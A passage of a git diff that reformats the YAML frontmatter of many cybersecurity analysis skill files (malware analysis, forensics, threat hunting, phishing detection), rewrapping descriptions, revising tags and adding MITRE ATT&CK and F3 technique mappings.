license: Apache-2.0
@@ -20,6 +25,11 @@ nist_csf:
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1190
- T1110.004
- T1078.004
- T1119
---
# Analyzing API Gateway Access Logs
skills/analyzing-apt-group-with-mitre-navigator/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-apt-group-with-mitre-navigator
description: Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps
of adversary TTPs for detection gap analysis and threat-informed defense.
description: Analyze advanced persistent threat (APT) group techniques using MITRE
ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap
analysis and threat-informed defense.
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -27,6 +28,12 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1059.001
- T1071.001
- T1003.001
- T1486
- T1547.001
---
# Analyzing APT Group with MITRE ATT&CK Navigator
skills/analyzing-azure-activity-logs-for-threats/SKILL.md
+15 -6
View File
@@ -1,17 +1,20 @@
---
name: analyzing-azure-activity-logs-for-threats
description: 'Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query to detect suspicious administrative
operations, impossible travel, privilege escalation, and resource modifications. Builds KQL queries for threat hunting in
Azure environments. Use when investigating suspicious Azure tenant activity or building cloud SIEM detections.
description: 'Queries Azure Monitor activity logs and sign-in logs via azure-monitor-query
to detect suspicious administrative operations, impossible travel, privilege escalation,
and resource modifications. Builds KQL queries for threat hunting in Azure environments.
Use when investigating suspicious Azure tenant activity or building cloud SIEM detections.
'
domain: cybersecurity
subdomain: security-operations
tags:
- analyzing
- azure
- activity
- logs
- cloud-security
- azure-monitor
- kql
- threat-hunting
- activity-logs
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -20,6 +23,12 @@ nist_csf:
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1078.004
- T1098.003
- T1538
- T1556.009
- T1580
---
# Analyzing Azure Activity Logs for Threats
skills/analyzing-bootkit-and-rootkit-samples/SKILL.md
+12 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-bootkit-and-rootkit-samples
description: 'Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR), Volume Boot Record
(VBR), or UEFI firmware to gain persistence below the operating system. Covers boot sector analysis, UEFI module inspection,
and anti-rootkit detection techniques. Activates for requests involving bootkit analysis, MBR malware investigation, UEFI
persistence analysis, or pre-OS malware detection.
description: 'Analyzes bootkit and advanced rootkit malware that infects the Master
Boot Record (MBR), Volume Boot Record (VBR), or UEFI firmware to gain persistence
below the operating system. Covers boot sector analysis, UEFI module inspection,
and anti-rootkit detection techniques. Activates for requests involving bootkit
analysis, MBR malware investigation, UEFI persistence analysis, or pre-OS malware
detection.
'
domain: cybersecurity
@@ -22,6 +24,12 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1542.003
- T1542.001
- T1542.002
- T1014
- T1547.006
---
# Analyzing Bootkit and Rootkit Samples
skills/analyzing-browser-forensics-with-hindsight/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-browser-forensics-with-hindsight
description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached
content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing
history, downloads, cookies, cached content, autofill data, saved passwords, and
browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -23,6 +24,11 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1217
- T1539
- T1555.003
- T1185
---
# Analyzing Browser Forensics with Hindsight
skills/analyzing-campaign-attribution-evidence/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-campaign-attribution-evidence
description: Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or
group is responsible for a cyber operation. This skill covers collecting and weighting attr
description: Campaign attribution analysis involves systematically evaluating evidence
to determine which threat actor or group is responsible for a cyber operation. This
skill covers collecting and weighting attr
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -20,6 +21,11 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1587.001
- T1583.001
- T1588.002
- T1071.001
---
# Analyzing Campaign Attribution Evidence
skills/analyzing-certificate-transparency-for-phishing/SKILL.md
+36 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-certificate-transparency-for-phishing
description: Monitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates,
and unauthorized certificate issuance targeting your organization.
description: Monitor Certificate Transparency logs using crt.sh and Certstream to
detect phishing domains, lookalike certificates, and unauthorized certificate issuance
targeting your organization.
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -23,6 +24,39 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1583.001
- T1583.004
- T1566.002
- T1608.005
- T1596.003
mitre_f3:
version: '1.1'
tactics:
- resource-development
- reconnaissance
- initial-access
techniques:
- id: T1583.001
name: 'Acquire Infrastructure: Domains'
tactic: resource-development
source: attack
- id: F1020.002
name: 'Create Fake Materials: Fake Website'
tactic: resource-development
source: f3
- id: T1593
name: Search Open Websites/Domains
tactic: reconnaissance
source: attack
- id: T1598
name: Phishing for Information
tactic: reconnaissance
source: attack
- id: T1660
name: Phishing
tactic: initial-access
source: attack
---
# Analyzing Certificate Transparency for Phishing
skills/analyzing-cloud-storage-access-patterns/SKILL.md
+18 -7
View File
@@ -1,15 +1,20 @@
---
name: analyzing-cloud-storage-access-patterns
description: Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage by analyzing CloudTrail Data Events, GCS
audit logs, and Azure Storage Analytics. Identifies after-hours bulk downloads, access from new IP addresses, unusual API
calls (GetObject spikes), and potential data exfiltration using statistical baselines and time-series anomaly detection.
description: Detect abnormal access patterns in AWS S3, GCS, and Azure Blob Storage
by analyzing CloudTrail Data Events, GCS audit logs, and Azure Storage Analytics.
Identifies after-hours bulk downloads, access from new IP addresses, unusual API
calls (GetObject spikes), and potential data exfiltration using statistical baselines
and time-series anomaly detection.
domain: cybersecurity
subdomain: cloud-security
tags:
- analyzing
- cloud
- storage
- access
- cloud-security
- aws-s3
- gcs
- azure-blob-storage
- cloudtrail
- data-access-anomaly
- exfiltration-detection
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -25,6 +30,12 @@ nist_csf:
- ID.AM-08
- GV.SC-06
- DE.CM-01
mitre_attack:
- T1530
- T1567.002
- T1619
- T1078.004
- T1048
---
skills/analyzing-cobalt-strike-beacon-configuration/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-cobalt-strike-beacon-configuration
description: Extract and analyze Cobalt Strike beacon configuration from PE files and memory dumps to identify C2 infrastructure,
malleable profiles, and operator tradecraft.
description: Extract and analyze Cobalt Strike beacon configuration from PE files
and memory dumps to identify C2 infrastructure, malleable profiles, and operator
tradecraft.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -20,6 +21,12 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1071.001
- T1573.001
- T1090.004
- T1105
- T1027
---
# Analyzing Cobalt Strike Beacon Configuration
skills/analyzing-cobaltstrike-malleable-c2-profiles/SKILL.md
+9 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-cobaltstrike-malleable-c2-profiles
description: Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike and pyMalleableC2 to extract
C2 indicators, detect evasion techniques, and generate network detection signatures.
description: Parse and analyze Cobalt Strike Malleable C2 profiles using dissect.cobaltstrike
and pyMalleableC2 to extract C2 indicators, detect evasion techniques, and generate
network detection signatures.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -20,6 +21,12 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1071.001
- T1573.002
- T1001.003
- T1090.004
- T1102
---
# Analyzing CobaltStrike Malleable C2 Profiles
skills/analyzing-command-and-control-communication/SKILL.md
+11 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-command-and-control-communication
description: 'Analyzes malware command-and-control (C2) communication protocols to understand beacon patterns, command structures,
data encoding, and infrastructure. Covers HTTP, HTTPS, DNS, and custom protocol C2 analysis for detection development and
threat intelligence. Activates for requests involving C2 analysis, beacon detection, C2 protocol reverse engineering, or
command-and-control infrastructure mapping.
description: 'Analyzes malware command-and-control (C2) communication protocols to
understand beacon patterns, command structures, data encoding, and infrastructure.
Covers HTTP, HTTPS, DNS, and custom protocol C2 analysis for detection development
and threat intelligence. Activates for requests involving C2 analysis, beacon detection,
C2 protocol reverse engineering, or command-and-control infrastructure mapping.
'
domain: cybersecurity
@@ -22,6 +23,12 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1071.001
- T1573
- T1571
- T1008
- T1095
---
# Analyzing Command-and-Control Communication
skills/analyzing-cyber-kill-chain/SKILL.md
+13 -5
View File
@@ -1,10 +1,12 @@
---
name: analyzing-cyber-kill-chain
description: 'Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain framework to identify which phases
an adversary has completed, where defenses succeeded or failed, and what controls would have interrupted the attack at earlier
phases. Use when conducting post-incident analysis, building prevention-focused security controls, or mapping detection
gaps to kill chain phases. Activates for requests involving kill chain analysis, intrusion kill chain, attack phase mapping,
or Lockheed Martin kill chain framework.
description: 'Analyzes intrusion activity against the Lockheed Martin Cyber Kill Chain
framework to identify which phases an adversary has completed, where defenses succeeded
or failed, and what controls would have interrupted the attack at earlier phases.
Use when conducting post-incident analysis, building prevention-focused security
controls, or mapping detection gaps to kill chain phases. Activates for requests
involving kill chain analysis, intrusion kill chain, attack phase mapping, or Lockheed
Martin kill chain framework.
'
domain: cybersecurity
@@ -24,6 +26,12 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1566.001
- T1190
- T1547.001
- T1071.001
- T1486
---
# Analyzing Cyber Kill Chain
skills/analyzing-disk-image-with-autopsy/SKILL.md
+7 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-disk-image-with-autopsy
description: Perform comprehensive forensic analysis of disk images using Autopsy to recover files, examine artifacts, and
build investigation timelines.
description: Perform comprehensive forensic analysis of disk images using Autopsy
to recover files, examine artifacts, and build investigation timelines.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,11 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1005
- T1074.001
- T1070.004
- T1083
---
# Analyzing Disk Image with Autopsy
skills/analyzing-dns-logs-for-exfiltration/SKILL.md
+8 -3
View File
@@ -1,8 +1,9 @@
---
name: analyzing-dns-logs-for-exfiltration
description: 'Analyzes DNS query logs to detect data exfiltration via DNS tunneling, DGA domain communication, and covert
C2 channels using entropy analysis, query volume anomalies, and subdomain length detection in SIEM platforms. Use when SOC
teams need to identify DNS-based threats that bypass traditional network security controls.
description: 'Analyzes DNS query logs to detect data exfiltration via DNS tunneling,
DGA domain communication, and covert C2 channels using entropy analysis, query volume
anomalies, and subdomain length detection in SIEM platforms. Use when SOC teams
need to identify DNS-based threats that bypass traditional network security controls.
'
domain: cybersecurity
@@ -28,6 +29,10 @@ nist_csf:
- DE.AE-02
- RS.MA-01
- DE.AE-06
mitre_attack:
- T1048.003
- T1071.004
- T1567
---
# Analyzing DNS Logs for Exfiltration
skills/analyzing-docker-container-forensics/SKILL.md
+7 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-docker-container-forensics
description: Investigate compromised Docker containers by analyzing images, layers, volumes, logs, and runtime artifacts to
identify malicious activity and evidence.
description: Investigate compromised Docker containers by analyzing images, layers,
volumes, logs, and runtime artifacts to identify malicious activity and evidence.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +19,11 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1610
- T1611
- T1613
- T1612
---
# Analyzing Docker Container Forensics
skills/analyzing-email-headers-for-phishing-investigation/SKILL.md
+38 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-email-headers-for-phishing-investigation
description: Parse and analyze email headers to trace the origin of phishing emails, verify sender authenticity, and identify
spoofing through SPF, DKIM, and DMARC validation.
description: Parse and analyze email headers to trace the origin of phishing emails,
verify sender authenticity, and identify spoofing through SPF, DKIM, and DMARC validation.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -22,6 +22,42 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1566.001
- T1566.002
- T1598.003
mitre_f3:
version: '1.1'
tactics:
- reconnaissance
- initial-access
- stealth
- resource-development
techniques:
- id: T1598
name: Phishing for Information
tactic: reconnaissance
source: attack
- id: T1660
name: Phishing
tactic: initial-access
source: attack
- id: T1672
name: Email Spoofing
tactic: stealth
source: attack
- id: F1032
name: Impersonate Official
tactic: initial-access
source: f3
- id: T1583.001
name: 'Acquire Infrastructure: Domains'
tactic: resource-development
source: attack
- id: F1020.002
name: 'Create Fake Materials: Fake Website'
tactic: resource-development
source: f3
---
# Analyzing Email Headers for Phishing Investigation
skills/analyzing-ethereum-smart-contract-vulnerabilities/SKILL.md
+6 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-ethereum-smart-contract-vulnerabilities
description: Perform static and symbolic analysis of Solidity smart contracts using Slither and Mythril to detect reentrancy,
integer overflow, access control, and other vulnerability classes before deployment to Ethereum mainnet.
description: Perform static and symbolic analysis of Solidity smart contracts using
Slither and Mythril to detect reentrancy, integer overflow, access control, and
other vulnerability classes before deployment to Ethereum mainnet.
domain: cybersecurity
subdomain: blockchain-security
tags:
@@ -20,6 +21,9 @@ nist_csf:
- PR.DS-01
- PR.DS-02
- ID.RA-01
mitre_attack:
- T1190
- T1059
---
# Analyzing Ethereum Smart Contract Vulnerabilities
skills/analyzing-golang-malware-with-ghidra/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-golang-malware-with-ghidra
description: Reverse engineer Go-compiled malware using Ghidra with specialized scripts for function recovery, string extraction,
and type reconstruction in stripped Go binaries.
description: Reverse engineer Go-compiled malware using Ghidra with specialized scripts
for function recovery, string extraction, and type reconstruction in stripped Go
binaries.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -20,6 +21,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1027
- T1620
- T1140
- T1059
---
# Analyzing Golang Malware with Ghidra
skills/analyzing-heap-spray-exploitation/SKILL.md
+7 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-heap-spray-exploitation
description: Detect and analyze heap spray attacks in memory dumps using Volatility3 plugins to identify NOP sled patterns,
shellcode landing zones, and suspicious large allocations in process virtual address space.
description: Detect and analyze heap spray attacks in memory dumps using Volatility3
plugins to identify NOP sled patterns, shellcode landing zones, and suspicious large
allocations in process virtual address space.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -18,6 +19,10 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1203
- T1059.007
- T1106
---
# Analyzing Heap Spray Exploitation
skills/analyzing-indicators-of-compromise/SKILL.md
+34 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-indicators-of-compromise
description: 'Analyzes indicators of compromise (IOCs) including IP addresses, domains, file hashes, URLs, and email artifacts
to determine maliciousness confidence, campaign attribution, and blocking priority. Use when triaging IOCs from phishing
emails, security alerts, or external threat feeds; enriching raw IOCs with multi-source intelligence; or making block/monitor/whitelist
decisions. Activates for requests involving VirusTotal, AbuseIPDB, MalwareBazaar, MISP, or IOC enrichment pipelines.
description: 'Analyzes indicators of compromise (IOCs) including IP addresses, domains,
file hashes, URLs, and email artifacts to determine maliciousness confidence, campaign
attribution, and blocking priority. Use when triaging IOCs from phishing emails,
security alerts, or external threat feeds; enriching raw IOCs with multi-source
intelligence; or making block/monitor/whitelist decisions. Activates for requests
involving VirusTotal, AbuseIPDB, MalwareBazaar, MISP, or IOC enrichment pipelines.
'
domain: cybersecurity
@@ -27,6 +29,34 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1071
- T1105
- T1041
- T1567
mitre_f3:
version: '1.1'
tactics:
- reconnaissance
- resource-development
- initial-access
techniques:
- id: T1598
name: Phishing for Information
tactic: reconnaissance
source: attack
- id: T1660
name: Phishing
tactic: initial-access
source: attack
- id: T1583.001
name: 'Acquire Infrastructure: Domains'
tactic: resource-development
source: attack
- id: F1020.002
name: 'Create Fake Materials: Fake Website'
tactic: resource-development
source: f3
---
# Analyzing Indicators of Compromise
skills/analyzing-ios-app-security-with-objection/SKILL.md
+9 -7
View File
@@ -1,12 +1,9 @@
---
name: analyzing-ios-app-security-with-objection
description: 'Performs runtime mobile security exploration of iOS applications using Objection, a Frida-powered toolkit that
enables security testers to interact with app internals without jailbreaking. Use when assessing iOS app security posture,
bypassing client-side protections, dumping keychain items, inspecting filesystem storage, and evaluating runtime behavior.
Activates for requests involving iOS security testing, Objection runtime analysis, Frida-based iOS assessment, or mobile
runtime exploration.
'
description: >-
Runtime iOS app security testing with Objection (Frida): inspect keychain and
filesystem data, explore app internals at runtime, and validate/bypass
client-side protections during authorized mobile assessments.
domain: cybersecurity
subdomain: mobile-security
author: mahipal
@@ -31,6 +28,11 @@ nist_csf:
- PR.AA-05
- ID.RA-01
- DE.CM-09
mitre_attack:
- T1635
- T1414
- T1417.001
- T1409
---
# Analyzing iOS App Security with Objection
skills/analyzing-kubernetes-audit-logs/SKILL.md
+15 -6
View File
@@ -1,17 +1,21 @@
---
name: analyzing-kubernetes-audit-logs
description: 'Parses Kubernetes API server audit logs (JSON lines) to detect exec-into-pod, secret access, RBAC modifications,
privileged pod creation, and anonymous API access. Builds threat detection rules from audit event patterns. Use when investigating
description: 'Parses Kubernetes API server audit logs (JSON lines) to detect exec-into-pod,
secret access, RBAC modifications, privileged pod creation, and anonymous API access.
Builds threat detection rules from audit event patterns. Use when investigating
Kubernetes cluster compromise or building k8s-specific SIEM detection rules.
'
domain: cybersecurity
subdomain: container-security
tags:
- analyzing
- kubernetes
- audit
- logs
- kubernetes-security
- container-security
- audit-log-analysis
- rbac
- privilege-escalation
- k8s-api-server
- threat-detection
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -20,6 +24,11 @@ nist_csf:
- PR.IR-01
- ID.AM-08
- DE.CM-01
mitre_attack:
- T1610
- T1613
- T1078
- T1552.007
---
# Analyzing Kubernetes Audit Logs
skills/analyzing-linux-audit-logs-for-intrusion/SKILL.md
+11 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-linux-audit-logs-for-intrusion
description: 'Uses the Linux Audit framework (auditd) with ausearch and aureport utilities to detect intrusion attempts, unauthorized
access, privilege escalation, and suspicious system activity. Covers audit rule configuration, log querying, timeline reconstruction,
and integration with SIEM platforms. Activates for requests involving auditd analysis, Linux audit log investigation, ausearch
queries, aureport summaries, or host-based intrusion detection on Linux.
description: 'Uses the Linux Audit framework (auditd) with ausearch and aureport utilities
to detect intrusion attempts, unauthorized access, privilege escalation, and suspicious
system activity. Covers audit rule configuration, log querying, timeline reconstruction,
and integration with SIEM platforms. Activates for requests involving auditd analysis,
Linux audit log investigation, ausearch queries, aureport summaries, or host-based
intrusion detection on Linux.
'
domain: cybersecurity
@@ -24,6 +26,11 @@ nist_csf:
- RS.MA-02
- RS.AN-03
- RC.RP-01
mitre_attack:
- T1059.004
- T1070
- T1548.003
- T1543.002
---
# Analyzing Linux Audit Logs for Intrusion
skills/analyzing-linux-elf-malware/SKILL.md
+34 -4
View File
@@ -1,9 +1,11 @@
---
name: analyzing-linux-elf-malware
description: 'Analyzes malicious Linux ELF (Executable and Linkable Format) binaries including botnets, cryptominers, ransomware,
and rootkits targeting Linux servers, containers, and cloud infrastructure. Covers static analysis, dynamic tracing, and
reverse engineering of x86_64 and ARM ELF samples. Activates for requests involving Linux malware analysis, ELF binary investigation,
Linux server compromise assessment, or container malware analysis.
description: 'Analyzes malicious Linux ELF (Executable and Linkable Format) binaries
including botnets, cryptominers, ransomware, and rootkits targeting Linux servers,
containers, and cloud infrastructure. Covers static analysis, dynamic tracing, and
reverse engineering of x86_64 and ARM ELF samples. Activates for requests involving
Linux malware analysis, ELF binary investigation, Linux server compromise assessment,
or container malware analysis.
'
domain: cybersecurity
@@ -22,6 +24,34 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1027
- T1059.004
- T1620
- T1574.006
mitre_f3:
version: '1.1'
tactics:
- positioning
- monetization
- reconnaissance
techniques:
- id: T1219
name: Remote Access Tools
tactic: positioning
source: attack
- id: T1555
name: Credentials from Password Stores
tactic: reconnaissance
source: attack
- id: F1018
name: Convert to Cryptocurrency
tactic: monetization
source: f3
- id: F1047
name: Transfer of funds
tactic: monetization
source: f3
---
# Analyzing Linux ELF Malware
skills/analyzing-linux-kernel-rootkits/SKILL.md
+8 -3
View File
@@ -1,8 +1,9 @@
---
name: analyzing-linux-kernel-rootkits
description: Detect kernel-level rootkits in Linux memory dumps using Volatility3 linux plugins (check_syscall, lsmod, hidden_modules),
rkhunter system scanning, and /proc vs /sys discrepancy analysis to identify hooked syscalls, hidden kernel modules, and
tampered system structures.
description: Detect kernel-level rootkits in Linux memory dumps using Volatility3
linux plugins (check_syscall, lsmod, hidden_modules), rkhunter system scanning,
and /proc vs /sys discrepancy analysis to identify hooked syscalls, hidden kernel
modules, and tampered system structures.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -22,6 +23,10 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1014
- T1547.006
- T1564.001
---
# Analyzing Linux Kernel Rootkits
skills/analyzing-linux-system-artifacts/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-linux-system-artifacts
description: Examine Linux system artifacts including auth logs, cron jobs, shell history, and system configuration to uncover
evidence of compromise or unauthorized activity.
description: Examine Linux system artifacts including auth logs, cron jobs, shell
history, and system configuration to uncover evidence of compromise or unauthorized
activity.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -19,6 +20,11 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1070
- T1059.004
- T1543.002
- T1053.003
---
# Analyzing Linux System Artifacts
skills/analyzing-lnk-file-and-jump-list-artifacts/SKILL.md
+7 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-lnk-file-and-jump-list-artifacts
description: Analyze Windows LNK shortcut files and Jump List artifacts to establish evidence of file access, program execution,
and user activity using LECmd, JLECmd, and manual binary parsing of the Shell Link Binary format.
description: Analyze Windows LNK shortcut files and Jump List artifacts to establish
evidence of file access, program execution, and user activity using LECmd, JLECmd,
and manual binary parsing of the Shell Link Binary format.
domain: cybersecurity
subdomain: digital-forensics
tags:
@@ -23,6 +24,10 @@ nist_csf:
- RS.AN-03
- DE.AE-02
- RS.MA-01
mitre_attack:
- T1547.009
- T1204.002
- T1059.001
---
# Analyzing LNK File and Jump List Artifacts
skills/analyzing-macro-malware-in-office-documents/SKILL.md
+10 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-macro-malware-in-office-documents
description: 'Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint) to identify download
cradles, payload execution, persistence mechanisms, and anti-analysis techniques. Uses olevba, oledump, and VBA deobfuscation
to extract the attack chain. Activates for requests involving Office macro analysis, VBA malware investigation, maldoc analysis,
or document-based threat examination.
description: 'Analyzes malicious VBA macros embedded in Microsoft Office documents
(Word, Excel, PowerPoint) to identify download cradles, payload execution, persistence
mechanisms, and anti-analysis techniques. Uses olevba, oledump, and VBA deobfuscation
to extract the attack chain. Activates for requests involving Office macro analysis,
VBA malware investigation, maldoc analysis, or document-based threat examination.
'
domain: cybersecurity
@@ -31,6 +32,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1137.001
- T1204.002
- T1059.005
- T1027
---
# Analyzing Macro Malware in Office Documents
skills/analyzing-malicious-pdf-with-peepdf/SKILL.md
+7 -2
View File
@@ -1,7 +1,7 @@
---
name: analyzing-malicious-pdf-with-peepdf
description: Perform static analysis of malicious PDF documents using peepdf, pdfid, and pdf-parser to extract embedded JavaScript,
shellcode, and suspicious objects.
description: Perform static analysis of malicious PDF documents using peepdf, pdfid,
and pdf-parser to extract embedded JavaScript, shellcode, and suspicious objects.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -21,6 +21,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1204.002
- T1059.007
- T1027
- T1106
---
# Analyzing Malicious PDF with peepdf
skills/analyzing-malicious-url-with-urlscan/SKILL.md
+7 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-malicious-url-with-urlscan
description: URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content,
HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
description: URLScan.io is a free service for scanning and analyzing suspicious URLs.
It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and
network connections of web pages in an isolat
domain: cybersecurity
subdomain: phishing-defense
tags:
@@ -22,6 +23,10 @@ nist_csf:
- DE.CM-09
- RS.CO-02
- DE.AE-02
mitre_attack:
- T1566.002
- T1204.001
- T1598.003
---
# Analyzing Malicious URL with URLScan
skills/analyzing-malware-behavior-with-cuckoo-sandbox/SKILL.md
+10 -4
View File
@@ -1,9 +1,10 @@
---
name: analyzing-malware-behavior-with-cuckoo-sandbox
description: 'Executes malware samples in Cuckoo Sandbox to observe runtime behavior including process creation, file system
modifications, registry changes, network communications, and API calls. Generates comprehensive behavioral reports for malware
classification and IOC extraction. Activates for requests involving dynamic malware analysis, sandbox detonation, behavioral
analysis, or automated malware execution.
description: 'Executes malware samples in Cuckoo Sandbox to observe runtime behavior
including process creation, file system modifications, registry changes, network
communications, and API calls. Generates comprehensive behavioral reports for malware
classification and IOC extraction. Activates for requests involving dynamic malware
analysis, sandbox detonation, behavioral analysis, or automated malware execution.
'
domain: cybersecurity
@@ -22,6 +23,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1497
- T1055
- T1071
- T1027
---
# Analyzing Malware Behavior with Cuckoo Sandbox
skills/analyzing-malware-family-relationships-with-malpedia/SKILL.md
+7 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-malware-family-relationships-with-malpedia
description: Use the Malpedia platform and API to research malware family relationships, track variant evolution, link families
to threat actors, and integrate YARA rules for detection across malware lineages.
description: Use the Malpedia platform and API to research malware family relationships,
track variant evolution, link families to threat actors, and integrate YARA rules
for detection across malware lineages.
domain: cybersecurity
subdomain: threat-intelligence
tags:
@@ -21,6 +22,10 @@ nist_csf:
- ID.RA-05
- DE.CM-01
- DE.AE-02
mitre_attack:
- T1587.001
- T1027
- T1071
---
# Analyzing Malware Family Relationships with Malpedia
skills/analyzing-malware-persistence-with-autoruns/SKILL.md
+8 -6
View File
@@ -1,7 +1,8 @@
---
name: analyzing-malware-persistence-with-autoruns
description: Use Sysinternals Autoruns to systematically identify and analyze malware persistence mechanisms across registry
keys, scheduled tasks, services, drivers, and startup locations on Windows systems.
description: Use Sysinternals Autoruns to systematically identify and analyze malware
persistence mechanisms across registry keys, scheduled tasks, services, drivers,
and startup locations on Windows systems.
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -14,10 +15,11 @@ tags:
- startup
- incident-response
mitre_attack:
- T1547
- T1053
- T1543
- T1546
- T1547.001
- T1543.003
- T1053.005
- T1574.001
- T1037.001
version: '1.0'
author: mahipal
license: Apache-2.0
skills/analyzing-malware-sandbox-evasion-techniques/SKILL.md
+8 -2
View File
@@ -1,7 +1,8 @@
---
name: analyzing-malware-sandbox-evasion-techniques
description: Detect sandbox evasion techniques in malware samples by analyzing timing checks, VM artifact queries, user interaction
detection, and sleep inflation patterns from Cuckoo/AnyRun behavioral reports
description: Detect sandbox evasion techniques in malware samples by analyzing timing
checks, VM artifact queries, user interaction detection, and sleep inflation patterns
from Cuckoo/AnyRun behavioral reports
domain: cybersecurity
subdomain: malware-analysis
tags:
@@ -26,6 +27,11 @@ nist_csf:
- RS.AN-03
- ID.RA-01
- DE.CM-01
mitre_attack:
- T1497.001
- T1497.003
- T1480
- T1027.002
---
# Analyzing Malware Sandbox Evasion Techniques
skills/analyzing-memory-forensics-with-lime-and-volatility/SKILL.md
+16 -7
View File
@@ -1,17 +1,21 @@
---
name: analyzing-memory-forensics-with-lime-and-volatility
description: 'Performs Linux memory acquisition using LiME (Linux Memory Extractor) kernel module and analysis with Volatility
3 framework. Extracts process lists, network connections, bash history, loaded kernel modules, and injected code from Linux
memory images. Use when performing incident response on compromised Linux systems.
description: 'Performs Linux memory acquisition using LiME (Linux Memory Extractor)
kernel module and analysis with Volatility 3 framework. Extracts process lists,
network connections, bash history, loaded kernel modules, and injected code from
Linux memory images. Use when performing incident response on compromised Linux
systems.
'
domain: cybersecurity
subdomain: security-operations
tags:
- analyzing
- memory
- forensics
- with
- memory-forensics
- linux-forensics
- lime
- volatility
- incident-response
- kernel-modules
version: '1.0'
author: mahipal
license: Apache-2.0
@@ -20,6 +24,11 @@ nist_csf:
- RS.MA-01
- GV.OV-01
- DE.AE-02
mitre_attack:
- T1055
